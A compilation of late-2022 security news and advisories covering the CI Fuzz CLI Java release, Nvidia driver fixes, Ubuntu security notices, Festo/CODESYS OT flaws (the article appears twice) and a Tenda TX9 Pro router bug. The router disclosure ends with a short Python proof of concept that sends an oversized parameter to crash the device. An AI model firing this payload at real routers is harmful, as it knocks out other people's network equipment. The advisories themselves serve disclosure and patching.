CI Fuzz CLI, the open source fuzzing tool with just three commands, integrates fuzz testing directly into the software development workflow.

The open source security tool CI Fuzz CLI now supports Java, according to Code Intelligence, the company behind the project.

Back in September, Code Intelligence announced CI Fuzz CLI, which lets developers run coverage-guided fuzz tests directly from the command line to find and fix functional bugs and security vulnerabilities at scale. CI Fuzz CLI can be integrated into common build systems such as Maven and Bazel; integrated development environments (IDEs), and continuous integration/continuous delivery (CI/CD) tools such as Jenkins. Initially, the tool supported C, C++, and CMake. The latest update, which includes the Junit integration, allows Java developers to run fuzz tests directly from the IDE.

Fuzz testing – or fuzzing – refers to when the tester throws a lot of data ("fuzz") against an application to see how the application reacts. Because the input data includes random and invalid inputs, developers can uncover issues which could result in memory corruptions, application crashes, and security issues such as denial-of-service and uncaught exceptions.

The latest guidelines for software verification from the National Institute of Standards and Technology includes fuzzing among the minimum standard requirements. Google recently reported more than 40,500 bugs in 650 open source projects have been uncovered through fuzz testing. The company launched OSS-Fuzz in 2016 in response to the Heartbleed vulnerability, a memory buffer overflow flaw that could have been detected by fuzz testing.

While fuzz testing is slowly gaining traction within the open source community, it is not yet widely used by developers outside open source and information security, Code Intelligence says. Part of that is because fuzzing is a specialized skill and many security teams don't have the knowledge and experience to use fuzz testing tools effectively. Code Intelligence says CI Fuzz CLI lowers the barrier to entry for fuzzing because the tool has only three commands. By allowing developers to run the tool from the command line or within the IDE makes fuzzing more accessible, the company says.

The fact that the tool integrates into the developer workflow means it can automatically fuzz the code whenever there is a new pull or merge request, the company says.

“Code Intelligence helps developers ship secure software by providing the necessary integrations to test their code at each pull request, without ever having to leave their favorite environment. It’s like having an automated security expert always by your side,” Thomas Dohmke, CEO of GitHub, said in a statement.

CI Fuzz CLI Brings Fuzz Testing to Java Applications

If unpatched, a host of GPU Display Driver flaws could expose gamers, graphic designers, and others to code execution, denial of service, data tampering, and more.

A new update from Nvidia for its GPU Display Driver includes fixes for a full 29 security vulnerabilities, seven with a base score of more than 7. 

The company's graphics cards are built to accelerate computing processing to support real-time or data-intensive applications. As such, they're known for their use by gamers, graphic designers, and other creative producers, and for artificial intelligence and machine learning. Impacted software products for the update specifically include GeForce, Studio, Nvidia RTX, Quadro, NVS, and Tesla.

The most serious of the bugs are two flaws that exist in the user mode layer for Windows versions, both of which could allow an unauthorized user to execute code, escalate privileges, launch denial-of-service attacks, and achieve data compromise and disclosure, according to the chipmaker:

*   **CVE‑2022‑34669** (CVSS score of 8.8): An unprivileged regular user can access or modify system files or other files that are critical to the application.
*   **CVE‑2022‑34671** (CVSS score of 8.7): An unprivileged regular user can cause an out-of-bounds write.

The display driver for Linux also received a number of updates in this latest security update. 

"Earlier software branch releases that support these products may also be affected," the Nvidia security update said. "If you are using an earlier branch release for which an update version is not listed above, upgrade to the latest branch release." 

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Nvidia GPU Driver Bugs Threaten Device Takeover & More

Ubuntu Security Notice 5718-2 - USN-5718-1 fixed a vulnerability in pixman. This update provides the corresponding update for Ubuntu 14.04 ESM and Ubuntu 16.04 ESM. Maddie Stone discovered that pixman incorrectly handled certain memory operations. A remote attacker could use this issue to cause pixman to crash, resulting in a denial of service, or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-5718-2  
November 30, 2022

pixman vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 16.04 ESM  
- Ubuntu 14.04 ESM

Summary:

pixman could be made to crash or run programs if it processed specially  
crafted input.

Software Description:  
- pixman: pixel-manipulation library for X and cairo

Details:

USN-5718-1 fixed a vulnerability in pixman. This update provides the  
corresponding update for Ubuntu 14.04 ESM and Ubuntu 16.04 ESM.

Original advisory details:

  Maddie Stone discovered that pixman incorrectly handled certain memory  
  operations. A remote attacker could use this issue to cause pixman to  
  crash, resulting in a denial of service, or possibly execute arbitrary  
  code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 16.04 ESM:  
   libpixman-1-0                   0.33.6-1ubuntu0.1~esm1  
   libpixman-1-dev                 0.33.6-1ubuntu0.1~esm1

Ubuntu 14.04 ESM:  
   libpixman-1-0                   0.30.2-2ubuntu1.2+esm1  
   libpixman-1-dev                 0.30.2-2ubuntu1.2+esm1

After a standard system update you need to restart your session to make  
all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-5718-2  
   https://ubuntu.com/security/notices/USN-5718-1  
   CVE-2022-44638

Ubuntu Security Notice USN-5718-2

Ubuntu Security Notice 5750-1 - It was discovered that GnuTLS incorrectly handled certain memory operations. A remote attacker could possibly use this issue to cause GnuTLS to crash, resulting in a denial of service.

    =========================================================================Ubuntu Security Notice USN-5750-1November 30, 2022gnutls28 vulnerability=========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 16.04 ESMSummary:GnuTLS could be made to crash if it received specially crafted networktraffic from an authenticated client.Software Description:- gnutls28: GNU TLS libraryDetails:It was discovered that GnuTLS incorrectly handled certain memoryoperations. A remote attacker could possibly use this issue to cause GnuTLSto crash, resulting in a denial of service.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 16.04 ESM:  libgnutls30                     3.4.10-4ubuntu1.9+esm1In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-5750-1  CVE-2021-4209

Ubuntu Security Notice USN-5750-1

Ubuntu Security Notice 5728-3 - Jann Horn discovered that the Linux kernel did not properly track memory allocations for anonymous VMA mappings in some situations, leading to potential data structure reuse. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that a race condition existed in the memory address space accounting implementation in the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-5728-3  
November 29, 2022

linux-gcp-5.4 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 18.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-gcp-5.4: Linux kernel for Google Cloud Platform (GCP) systems

Details:

Jann Horn discovered that the Linux kernel did not properly track memory  
allocations for anonymous VMA mappings in some situations, leading to  
potential data structure reuse. A local attacker could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2022-42703)

It was discovered that a race condition existed in the memory address space  
accounting implementation in the Linux kernel, leading to a use-after-free  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2022-41222)

It was discovered that a race condition existed in the instruction emulator  
of the Linux kernel on Arm 64-bit systems. A local attacker could use this  
to cause a denial of service (system crash). (CVE-2022-20422)

It was discovered that the KVM implementation in the Linux kernel did not  
properly handle virtual CPUs without APICs in certain situations. A local  
attacker could possibly use this to cause a denial of service (host system  
crash). (CVE-2022-2153)

Hao Sun and Jiacheng Xu discovered that the NILFS file system  
implementation in the Linux kernel contained a use-after-free  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2022-2978)

Johannes Wikner and Kaveh Razavi discovered that for some Intel x86-64  
processors, the Linux kernel's protections against speculative branch  
target injection attacks were insufficient in some circumstances. A local  
attacker could possibly use this to expose sensitive information.  
(CVE-2022-29901)

Abhishek Shah discovered a race condition in the PF_KEYv2 implementation in  
the Linux kernel. A local attacker could use this to cause a denial of  
service (system crash) or possibly expose sensitive information (kernel  
memory). (CVE-2022-3028)

It was discovered that the Netlink device interface implementation in the  
Linux kernel did not properly handle certain error conditions, leading to a  
use-after-free vulnerability with some network device drivers. A local  
attacker with admin access to the network device could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2022-3625)

It was discovered that the IDT 77252 ATM PCI device driver in the Linux  
kernel did not properly remove any pending timers during device exit,  
resulting in a use-after-free vulnerability. A local attacker could  
possibly use this to cause a denial of service (system crash) or execute  
arbitrary code. (CVE-2022-3635)

Jann Horn discovered a race condition existed in the Linux kernel when  
unmapping VMAs in certain situations, resulting in possible use-after-free  
vulnerabilities. A local attacker could possibly use this to cause a denial  
of service (system crash) or execute arbitrary code. (CVE-2022-39188)

Xingyuan Mo and Gengjia Chen discovered that the Promise SuperTrak EX  
storage controller driver in the Linux kernel did not properly handle  
certain structures. A local attacker could potentially use this to expose  
sensitive information (kernel memory). (CVE-2022-40768)

Sönke Huster discovered that a use-after-free vulnerability existed in the  
WiFi driver stack in the Linux kernel. A physically proximate attacker  
could use this to cause a denial of service (system crash) or possibly  
execute arbitrary code. (CVE-2022-42719)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 18.04 LTS:  
   linux-image-5.4.0-1093-gcp      5.4.0-1093.102~18.04.1  
   linux-image-gcp                 5.4.0.1093.71

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-5728-3  
   https://ubuntu.com/security/notices/USN-5728-1  
   CVE-2022-20422, CVE-2022-2153, CVE-2022-2978, CVE-2022-29901,  
   CVE-2022-3028, CVE-2022-3625, CVE-2022-3635, CVE-2022-39188,  
   CVE-2022-40768, CVE-2022-41222, CVE-2022-42703, CVE-2022-42719

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-gcp-5.4/5.4.0-1093.102~18.04.1

Ubuntu Security Notice USN-5728-3

Ubuntu Security Notice 5748-1 - It was discovered that Sysstat incorrectly handled certain arithmetic multiplications. An attacker could use this issue to cause Sysstat to crash, resulting in a denial of service, or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-5748-1  
November 29, 2022

sysstat vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 22.10  
- Ubuntu 22.04 LTS  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS

Summary:

Sysstat could be made to crash or run programs if it processed specially  
crafted data.

Software Description:  
- sysstat: system performance tools for Linux

Details:

It was discovered that Sysstat incorrectly handled certain arithmetic  
multiplications. An attacker could use this issue to cause Sysstat to  
crash, resulting in a denial of service, or possibly execute arbitrary  
code.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 22.10:  
   isag                            12.5.6-1ubuntu0.1  
   sysstat                         12.5.6-1ubuntu0.1

Ubuntu 22.04 LTS:  
   isag                            12.5.2-2ubuntu0.1  
   sysstat                         12.5.2-2ubuntu0.1

Ubuntu 20.04 LTS:  
   isag                            12.2.0-2ubuntu0.2  
   sysstat                         12.2.0-2ubuntu0.2

Ubuntu 18.04 LTS:  
   isag                            11.6.1-1ubuntu0.2  
   sysstat                         11.6.1-1ubuntu0.2

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-5748-1  
   CVE-2022-39377

Package Information:  
   https://launchpad.net/ubuntu/+source/sysstat/12.5.6-1ubuntu0.1  
   https://launchpad.net/ubuntu/+source/sysstat/12.5.2-2ubuntu0.1  
   https://launchpad.net/ubuntu/+source/sysstat/12.2.0-2ubuntu0.2  
   https://launchpad.net/ubuntu/+source/sysstat/11.6.1-1ubuntu0.2

Ubuntu Security Notice USN-5748-1

Researchers have disclosed details of three new security vulnerabilities affecting operational technology (OT) products from CODESYS and Festo that could lead to source code tampering and denial-of-service (DoS).

The vulnerabilities, reported by Forescout Vedere Labs, are the latest in a long list of flaws collectively tracked under the name OT:ICEFALL.

"These issues exemplify either an insecure-by-design approach — which was usual at the time the products were launched – where manufacturers include dangerous functions that can be accessed with no authentication or a subpar implementation of security controls, such as cryptography," the researchers said.

The most critical of the flaws is CVE-2022-3270 (CVSS score: 9.8), a critical vulnerability that affects Festo automation controllers using the Festo Generic Multicast (FGMC) protocol to reboot the devices without requiring any authentication and cause a denial of service (DoS) condition.

Another DoS shortcoming in Festo controllers (CVE-2022-3079, CVSS score: 7.5) relates to a case of unauthenticated, remote access to an undocumented web page ("cec-reboot.php") that could be exploited by an attacker with network access to Festo CPX-CEC-C1 and CPX-CMXX PLCs.

The third issue, on the other hand, concerns the use of weak cryptography in the CODESYS V3 runtime environment to secure download code and boot applications (CVE-2022-4048, CVSS score: 7.7), which could be abused by a bad actor to decrypt and manipulate the source code, thereby undermining confidentiality and integrity protections.

Forescout said it also identified two known CODESYS bugs impacting Festo CPX-CEC-C1 controllers (CVE-2022-31806 and CVE-2022-22515) that stem from an unsafe configuration in the Control runtime environment, and could lead to a denial-of-service sans authentication.

"This is yet another example of a supply chain issue where a vulnerability has not been disclosed for all the products it affects," the researchers said.

To mitigate potential threats, organizations are recommended to discover and inventory vulnerable devices, enforce appropriate network segmentation controls, and monitor network traffic for anomalous activity.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

3 New Vulnerabilities Affect OT Products from German Companies Festo and CODESYS

Researchers have disclosed details of three new security vulnerabilities affecting operational technology (OT) products from CODESYS and Festo that could lead to source code tampering and denial-of-service (DoS).
The vulnerabilities, reported by Forescout Vedere Labs, are the latest in a long list of flaws collectively tracked under the name OT:ICEFALL.
"These issues exemplify either an

Researchers have disclosed details of three new security vulnerabilities affecting operational technology (OT) products from CODESYS and Festo that could lead to source code tampering and denial-of-service (DoS).

The vulnerabilities, reported by Forescout Vedere Labs, are the latest in a long list of flaws collectively tracked under the name OT:ICEFALL.

"These issues exemplify either an insecure-by-design approach — which was usual at the time the products were launched – where manufacturers include dangerous functions that can be accessed with no authentication or a subpar implementation of security controls, such as cryptography," the researchers said.

The most critical of the flaws is CVE-2022-3270 (CVSS score: 9.8), a critical vulnerability that affects Festo automation controllers using the Festo Generic Multicast (FGMC) protocol to reboot the devices without requiring any authentication and cause a denial of service (DoS) condition.

Another DoS shortcoming in Festo controllers (CVE-2022-3079, CVSS score: 7.5) relates to a case of unauthenticated, remote access to an undocumented web page ("cec-reboot.php") that could be exploited by an attacker with network access to Festo CPX-CEC-C1 and CPX-CMXX PLCs.

The third issue, on the other hand, concerns the use of weak cryptography in the CODESYS V3 runtime environment to secure download code and boot applications (CVE-2022-4048, CVSS score: 7.7), which could be abused by a bad actor to decrypt and manipulate the source code, thereby undermining confidentiality and integrity protections.

Forescout said it also identified two known CODESYS bugs impacting Festo CPX-CEC-C1 controllers (CVE-2022-31806 and CVE-2022-22515) that stem from an unsafe configuration in the Control runtime environment, and could lead to a denial-of-service sans authentication.

"This is yet another example of a supply chain issue where a vulnerability has not been disclosed for all the products it affects," the researchers said.

To mitigate potential threats, organizations are recommended to discover and inventory vulnerable devices, enforce appropriate network segmentation controls, and monitor network traffic for anomalous activity.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

3 New Vulnerabilities Affect OT Products from German Festo and CODESYS Companies

A race condition in the x86 KVM subsystem in the Linux kernel through 6.1-rc6 allows guest OS users to cause a denial of service (host OS crash or host OS memory corruption) when nested virtualisation and the TDP MMU are enabled.

CVE-2022-45869

Tenda TX9 Pro v22.03.02.10 was discovered to contain a stack overflow via the list parameter at /goform/SetIpMacBind.

Affect device: Tenda-TX9 Pro V22.03.02.10 (https://www.tendacn.com/download/detail-4219.html)

Vulnerability Type: Stack overflow

Impact: Denial of Service(DoS)

**Vulnerability description**

This vulnerability is a stack overflow triggered in the sub_42EDE4 function, which satisfies the request of the upper-level interface function sub_42F124, that is, handles the post request under /goform/SetIpMacBind

The sub_42F124 function calls sub_42EFF8 function

In the sub_42EFF8 function, the two local variables v4 and v5 are obtained directly from the http request parameter bindnum and list, respectively .

The address of v5 (v9) is used as the second parameter of the sub_42EDE4 function

Then it calls sub_42EDE4 function

In the sub_42EDE4 function, v6 is incoming **list** parameter, and it is copied to v18 without length limit and security check. So the attacker can cause stack overflow through a long list and achieve denial of service attack

**poc**

import requests
from pwn import \*

url \= "http://192.168.28.131/goform/SetIpMacBind"
cookie \= {"Cookie":"password=aaa"}
data \= {"bindnum": "1", "list":"\\r" + "A" \* 0x500}

requests.post(url, cookies\=cookie, data\=data)

Tag

#dos